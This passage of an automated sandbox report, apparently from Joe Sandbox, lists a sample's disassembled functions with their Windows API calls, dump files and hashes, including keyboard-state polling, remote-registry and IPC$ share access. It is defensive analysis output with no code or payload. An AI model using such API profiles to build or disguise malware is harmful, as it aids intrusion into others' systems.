                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00A8AB55
                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00A8AB63
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                • Opcode ID: 7c1fa9e7de98746810d16ac55a3515489b5065aa405c3c25b5a82ec935e28566
                                                                                                                                                                                                                                                                • Instruction ID: 5b971399e3c1533837244147d3929f279ff45a7c489faf3a1e56dbf48fe48d32
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1fa9e7de98746810d16ac55a3515489b5065aa405c3c25b5a82ec935e28566
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD51D770A0878429FB35F7A08954BEABFB59F22380F08459BC5C25B5C2DA649F4CC763
                                                                                                                                                                                                                                                                Function 00A8662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00A86649
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00A86662
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00A866C0
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00A866D0
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00A866E2
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00A86736
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00A86744
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00A86756
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A86798
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00A867AB
                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A867C1
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00A867CE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                • Opcode ID: 5380910251a4ca6d3c7988b80e6c3180cf4c3b5eac3eb4a0c88540919e954cde
                                                                                                                                                                                                                                                                • Instruction ID: aa402833b41d388a897a3b5c6c35b03d40c26f3f7ba8832f7c41a93ee000b832
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5380910251a4ca6d3c7988b80e6c3180cf4c3b5eac3eb4a0c88540919e954cde
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51514070B00205AFDF18DFA8DD95AAEBBB5FB48314F108229F519E72A1E7709D01CB50
                                                                                                                                                                                                                                                                Function 00A2146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A21488,?,00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A21865
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00A21521
                                                                                                                                                                                                                                                                • KillTimer.USER32(00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A215BB
                                                                                                                                                                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00A629B4
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A629E2
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A629F9
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A2145A,00000000), ref: 00A62A15
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00A62A27
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 641708696-0
                                                                                                                                                                                                                                                                • Opcode ID: 0867c2f9a997bdaf7aa015600a6bad370238faa39f68e5e28a5a53ef912c9106
                                                                                                                                                                                                                                                                • Instruction ID: 41f8241eaa3b61bec197912bd801f7ca64fc3691a4cec504e47f267674b69138
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0867c2f9a997bdaf7aa015600a6bad370238faa39f68e5e28a5a53ef912c9106
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9616C31501B25DFDB35DF98E988B3977B1FBA0322F108569E44397670C7B1A892DB81
                                                                                                                                                                                                                                                                Function 00A22128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A22234: GetWindowLongW.USER32(?,000000EB), ref: 00A22242
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00A22152
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 259745315-0
                                                                                                                                                                                                                                                                • Opcode ID: 018690a6e3f5a91bd4cb89c9f01fd5087f4e0e14c35cd9f7822e6e2d7476cf0c
                                                                                                                                                                                                                                                                • Instruction ID: e6440181136ba5250da56cc45fec703280e1794029e1c3172f58e4f5a8bb2792
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 018690a6e3f5a91bd4cb89c9f01fd5087f4e0e14c35cd9f7822e6e2d7476cf0c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C417035100650BFDB249F6CAC44FBA3B76AB46320F144365EAA6872F2D7319953DB11
                                                                                                                                                                                                                                                                Function 00A8A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00A70D31,00000001,0000138C,00000001,00000000,00000001,?,00A9EEAE,00AF2430), ref: 00A8A091
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00A70D31,00000001), ref: 00A8A09A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A70D31,00000001,0000138C,00000001,00000000,00000001,?,00A9EEAE,00AF2430,?), ref: 00A8A0BC
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00A70D31,00000001), ref: 00A8A0BF
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A8A1E0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                • Opcode ID: fd44c9525ce8515f420e0f748198e31cdf1cc1231fbe546f1364be90acd284ea
                                                                                                                                                                                                                                                                • Instruction ID: 23ab7e8df32049a85686fc1756142dfd3d2e293babb9a044e3ed404a1fd09fc6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd44c9525ce8515f420e0f748198e31cdf1cc1231fbe546f1364be90acd284ea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14414F72840219ABDF05FBE4EE46EEEB778AF18300F500565F501B6092EB756F49CB61
                                                                                                                                                                                                                                                                Function 00A80FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A81093
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A810AF
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A810CB
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A810F5
                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00A8111D
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A81128
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A8112D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                • Opcode ID: 1a19edee2a5cc3983fd546dc75cfd0465d4fdbd379622212b6428710bc1e9c20
                                                                                                                                                                                                                                                                • Instruction ID: c5653882e6e2ba9a860dc7aa38acd577f7fe9d4d09de4936fe901ca4d138afc2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a19edee2a5cc3983fd546dc75cfd0465d4fdbd379622212b6428710bc1e9c20
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4641F672C10229ABDF21EBA8ED85DEEB778FF14750F404569F901A3161EB319E05CBA0
                                                                                                                                                                                                                                                                Function 00AB4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AB4AD9
                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00AB4AE0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AB4AF3
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00AB4AFB
                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00AB4B06
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00AB4B10
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00AB4B1A
                                                                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00AB4B30
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00AB4B3C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                • String ID: static
                                                                                                                                                                                                                                                                • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                • Opcode ID: a3ff39158c64d6d926253a11105be7be5627c30ae28741fe0da1bfc866297373
                                                                                                                                                                                                                                                                • Instruction ID: f2cef5548e4b3561d8ded94b37b7da3ba19e233b3ccbdfa59ec76921a990747b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3ff39158c64d6d926253a11105be7be5627c30ae28741fe0da1bfc866297373
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB312932140219ABDF119FA8DC08FDA3BADFF0D364F110325FA15A61A2D775D851DB94
                                                                                                                                                                                                                                                                Function 00AA468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AA46B9
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AA46E7
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00AA46F1
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AA478A
                                                                                                                                                                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00AA480E
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AA4932
                                                                                                                                                                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00AA496B
                                                                                                                                                                                                                                                                • CoGetObject.OLE32(?,00000000,00AC0B64,?), ref: 00AA498A
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00AA499D
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AA4A21
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AA4A35
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 429561992-0
                                                                                                                                                                                                                                                                • Opcode ID: db63abac3a6132e26281b408839a8e4ca2388b498cfe66e5890eaa6d217e2bf9
                                                                                                                                                                                                                                                                • Instruction ID: c5cc6b44d0a871f4015e8e64a7cf27702682216f3dbcabc5064253ef7fea07af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db63abac3a6132e26281b408839a8e4ca2388b498cfe66e5890eaa6d217e2bf9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5C124716043419FC700DF68D88492BBBE9FF8A748F10492DF9899B261DB71ED06CB52
                                                                                                                                                                                                                                                                Function 00A984DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00A98538
                                                                                                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A985D4
                                                                                                                                                                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00A985E8
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00AC0CD4,00000000,00000001,00AE7E8C,?), ref: 00A98634
                                                                                                                                                                                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A986B9
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00A98711
                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00A9879C
                                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A987BF
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00A987C6
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00A9881B
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00A98821
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                • Opcode ID: e58abe79cef7117e93c2b98790949e30b1cbf37790c31216c15329f947fbd10b
                                                                                                                                                                                                                                                                • Instruction ID: 5a1ad105b4f77eb4ad93c95d0e5355e1622ac45ddd8e11e3f1e819ad3129d407
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e58abe79cef7117e93c2b98790949e30b1cbf37790c31216c15329f947fbd10b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80C13B75A00115AFCB14DFA8C984DAEBBF9FF49304B1485A8F419DB262DB34ED45CB90
                                                                                                                                                                                                                                                                Function 00A80378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A8039F
                                                                                                                                                                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00A803F8
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00A8040A
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A8042A
                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00A8047D
                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A80491
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A804A6
                                                                                                                                                                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00A804B3
                                                                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A804BC
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A804CE
                                                                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A804D9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                • Opcode ID: f03ca8468619da6c7b09caff66eb68fa6c2825d2f110117925d18d064741cc65
                                                                                                                                                                                                                                                                • Instruction ID: 4644e1b9c325d27129fe30226acc63bea5bb3e1839e194d1d9222fa53119348c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f03ca8468619da6c7b09caff66eb68fa6c2825d2f110117925d18d064741cc65
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00416375A00219DFCF14EFA8D844DAE7FB9FF48344F008565E955A7262DB30A946CF90
